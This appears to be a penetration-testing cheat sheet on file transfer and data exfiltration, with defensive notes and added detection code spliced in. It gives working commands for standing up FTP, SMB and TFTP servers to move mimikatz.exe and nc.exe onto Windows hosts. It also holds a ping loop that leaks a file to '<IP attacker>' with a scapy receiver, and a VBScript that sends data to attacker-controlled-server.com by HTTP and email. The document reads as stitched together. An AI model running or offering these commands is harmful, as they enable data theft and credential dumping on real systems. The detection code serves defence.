#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Windows client
#Works well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
SMB
Kali as server
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
Or create an SMB share using samba:
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
    comment = Samba on Ubuntu
    path = /tmp/smb
    read only = no
    browsable = yes
    guest ok = Yes
#Start samba
service smbd restart
Windows
Exfiltration
Exfiltration Over Alternative Protocol
Description
Data exfiltration can be achieved using various protocols other than HTTP/HTTPS, such as DNS, ICMP, or SMTP.
Detection
Monitor network traffic for unusual DNS requests, especially those containing encoded data.
Look for abnormal ICMP or SMTP traffic patterns.
Implement egress filtering to restrict unnecessary outbound traffic.
Prevention
Use encryption to protect data in transit.
Implement network segmentation to limit lateral movement.
Disable unnecessary services and protocols to reduce attack surface.
Tools
dnscat2: A tool for tunneling data through DNS servers.
Iodine: A tool for tunneling IPv4 data through a DNS server.
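As an added defensive example (not code from the original page): a heuristic pass over constructed DNS query-log lines that flags the long, high-entropy labels and TXT/NULL lookups typical of DNS tunnels such as dnscat2 and Iodine. The BIND-style log format, the thresholds and the two-label registered-domain assumption are mine and need tuning per environment.

```python
import math
import re
from collections import Counter

# Constructed sample of BIND-style query log lines (not from the original page);
# the third to fifth lines mimic the long, hex-looking labels a DNS tunnel emits.
SAMPLE_LOG = """\
client 10.0.0.5#53211: query: www.example.com IN A
client 10.0.0.5#53212: query: mail.example.com IN MX
client 10.0.0.7#40001: query: 4a6f686e20446f65204553534e.t.tunnel-example.net IN TXT
client 10.0.0.7#40002: query: 0b3f9a2c7e1d5f8a9b4c6d2e1f3a5b7c.t.tunnel-example.net IN TXT
client 10.0.0.7#40003: query: 9d8e7f6a5b4c3d2e1f0a9b8c7d6e5f4a.t.tunnel-example.net IN TXT
client 10.0.0.9#51000: query: cdn.static.example.org IN AAAA
"""

QUERY_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<qtype>\w+)")

def shannon_entropy(s):
    """Bits of entropy per character; hex-encoded data scores near 4, hostnames far lower."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def name_features(name):
    """Return (longest label length, entropy of everything left of the registered domain)."""
    labels = name.rstrip(".").split(".")
    data_part = "".join(labels[:-2])   # assumes a two-label registered domain (example.com)
    return max(len(l) for l in labels), shannon_entropy(data_part)

def is_suspicious(name, qtype, max_label=30, min_entropy=3.5):
    """Flag long labels, high-entropy subdomains, or bulky record types
    (TXT/NULL, favoured by tunnels) combined with a sizeable label."""
    longest, entropy = name_features(name)
    return (longest > max_label or entropy > min_entropy
            or (qtype in ("TXT", "NULL") and longest >= 16))

def suspicious_queries(log_text):
    """Parse the log and return [(src_ip, name, qtype)] for queries that trip the heuristics."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m and is_suspicious(m["name"], m["qtype"]):
            hits.append((m["src"], m["name"], m["qtype"]))
    return hits

def per_source_counts(log_text):
    """Suspicious queries per client; a tunnel shows up as one persistently noisy source."""
    return dict(Counter(src for src, _, _ in suspicious_queries(log_text)))
```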
Exfiltration Over Unencrypted Protocols
Description
Attackers can exfiltrate data over unencrypted protocols like FTP, Telnet, or SNMP.
Detection
Monitor network traffic for FTP, Telnet, or SNMP connections.
Look for large amounts of data being transferred over these protocols.
Implement deep packet inspection to analyze payload contents.
Prevention
Use secure protocols like SFTP, SSH, or SNMPv3.
Implement strong authentication mechanisms.
Encrypt data at rest and in transit.
Tools
Wireshark: A network protocol analyzer for monitoring and analyzing network traffic.
Snort: An open-source network intrusion detection and prevention system.
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
NC (Netcat) is a powerful networking tool that is often used to transfer data between systems over a network. It can be used to perform various tasks, including data exfiltration.
# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will send 4 bytes per ping packet (you could probably increase this up to 16)
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 0:
            data = pkt[ICMP].load[-4:] #Read the 4 interesting bytes
            print(f"{data.decode('utf-8')}", flush=True, end="")
sniff(iface="tun0", prn=process_packet)
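Added example, not part of the original page: a classifier for ICMP echo payloads that separates the default Linux and Windows ping fills from the repeated short pattern that `ping -p` produces, which is what the xxd loop above generates. The payloads are constructed; the leading 8 zero bytes stand in for the timestamp Linux ping prepends to its data.

```python
from collections import Counter

# Constructed payloads (bytes after the ICMP header); not captured from any real host.
LINUX_DEFAULT = bytes(8) + bytes(range(0x10, 0x10 + 48))   # iputils default 56-byte payload
WINDOWS_DEFAULT = b"abcdefghijklmnopqrstuvwabcdefghi"       # Windows default 32-byte payload
PATTERN_FILL = bytes(8) + b"\xde\xad\xbe\xef" * 12          # shape of a `ping -p deadbeef` payload

def is_sequential_fill(data):
    """Linux ping fills the data after the 8-byte timestamp with 0x10, 0x11, 0x12, ..."""
    return len(data) > 8 and all(b == (0x10 + i) & 0xFF for i, b in enumerate(data[8:]))

def repeating_period(data, max_period=16):
    """Smallest p <= max_period such that data repeats with period p, else None.
    ping -p accepts up to 16 pattern bytes, so longer periods are not worth testing."""
    for p in range(1, max_period + 1):
        if len(data) >= 2 * p and all(data[i] == data[i % p] for i in range(len(data))):
            return p
    return None

def classify_payload(data):
    """Label a payload as a known OS default, a short repeated pattern, or something else."""
    if data == WINDOWS_DEFAULT:
        return "windows-default"
    if is_sequential_fill(data):
        return "linux-default"
    if repeating_period(data[8:]) is not None:
        return "pattern-fill"
    return "other"

def count_pattern_fills(packets):
    """packets: iterable of (src_ip, payload). Returns {src_ip: number of pattern-filled pings}.
    A host emitting many pattern-filled pings with a different pattern each time is the
    signature of the xxd/ping loop above and deserves a closer look."""
    counts = Counter()
    for src, payload in packets:
        if classify_payload(payload) == "pattern-fill":
            counts[src] += 1
    return dict(counts)
```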
SMTP
If you can send data to an SMTP server, you can create an SMTP server to receive the data using python:
sudo python -m smtpd -n -c DebuggingServer :25
TFTP
Available by default in XP and 2003 (on other versions it has to be explicitly added during installation)
On Kali, start a TFTP server:
#I didn't get these options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp
VBScript can be used to exfiltrate data from a compromised system. Below are some common techniques:
Writing to Files: VBScript can write data to a file on the system, which can then be exfiltrated using various methods.
Sending Emails: VBScript can be used to send emails with the exfiltrated data as attachments or within the email body.
HTTP Requests: VBScript can make HTTP requests to an external server controlled by the attacker to exfiltrate data.
DNS Requests: VBScript can make DNS requests with encoded data to exfiltrate information.
Example VBScript Exfiltration Code
' Example VBScript code for exfiltrating data
' Write data to a file
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.CreateTextFile("C:\exfiltrated_data.txt", True)
objFile.Write "Sensitive data to exfiltrate"
objFile.Close
' Send an email
Set objEmail = CreateObject("CDO.Message")
objEmail.From = "attacker@example.com"
objEmail.To = "recipient@example.com"
objEmail.Subject = "Exfiltrated Data"
objEmail.TextBody = "Attached is the exfiltrated data."
objEmail.AddAttachment "C:\exfiltrated_data.txt"
objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.example.com"
objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
objEmail.Configuration.Fields.Update
objEmail.Send
' Make an HTTP request
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objHTTP.Open "GET", "http://attacker-controlled-server.com/exfiltrate.php?data=exfiltrated_data", False
objHTTP.Send
' Make a DNS request
Set objDNS = CreateObject("MSXML2.ServerXMLHTTP")
objDNS.Open "GET", "http://attacker-controlled-dns.com", False
objDNS.Send
These are just a few examples of how VBScript can be used for exfiltration. It is important to note that using VBScript for malicious purposes is illegal and unethical.
The debug.exe program not only allows inspection of binary files but can also reconstruct them from hexadecimal code. This means that, given the hexadecimal code of a binary file, debug.exe can generate that binary file. However, it is important to note that debug.exe is limited to assembling files up to 64 KB in size.
# Reduce the size
upx -9 nc.exe
wine exe2bat.exe nc.exe nc.txt